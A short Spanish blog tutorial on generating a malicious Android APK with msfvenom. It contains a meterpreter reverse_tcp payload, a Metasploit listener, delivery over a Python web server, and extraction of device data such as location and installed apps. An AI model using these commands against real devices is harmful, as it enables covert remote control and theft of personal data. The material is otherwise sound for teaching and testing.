Disclamer: Todas las pruebas, ejemplos, códigos y/o explicaciones que aquí se exponen tienen un ámbito didáctico. Se rechaza cualquier actividad ilícita generada por lo expuesto en este escrito.
Para desarrollar esta demostración utilizaremos un terminal Android en cualquier versión y una consola de meterpreter desde una distribución Linux como puede ser Kali.
# msfvenom –p android/meterpreter/reverse_tcp LHOST=172.17.0.3 LPORT=9001 -f raw -o SysBeards_Client.apk
msf6 > use exploit/multi/handler
msf6 > set payload android/meterpreter/reverse_tcp msd6 > set LHOST 172.17.0.3
msf6 > set LPORT 9001
msf6 > run
Ahora que está todo preparado ya es posible ejecutar la APK en el dispositivo Android. Para hacer llegar la app podemos montar rápidamente un servidor web con Python (python -m http.server 80) e importante activar los orígenes desconocidos.
Cuando se ejecute la aplicación veremos unas ventanas que no gustan mucho…
No todo podía ser tan “bonito”. Obviamente la aplicación es maliciosa y lo detecta Google Play Protect. Aun así, para probar el funcionamiento, ejecutaremos la app. Ahora veremos como nuestra aplicación solicita multitud de permisos que nosotros amablemente aceptaremos 🙂
Y una vez está todo corriendo, nuestra consola de Metasploit recibirá la shell!
Desde este punto se podrán ejecutar comandos propios de meterpreter para extraer información del dispositivo como la versión de Android, las aplicaciones instaladas, la posición geográfica, etc.
Ahora que conocemos como crear malware en Android, faltaría aplicar técnicas de evasión para que las protecciones que pueda tener el dispositivo no lo detecten. Pero esto ya, es “otro cantar”.
¿Qué os ha parecido?¿Conocíais esta posibilidad dentro de MSFvenom? Dejadnos los comentarios 😉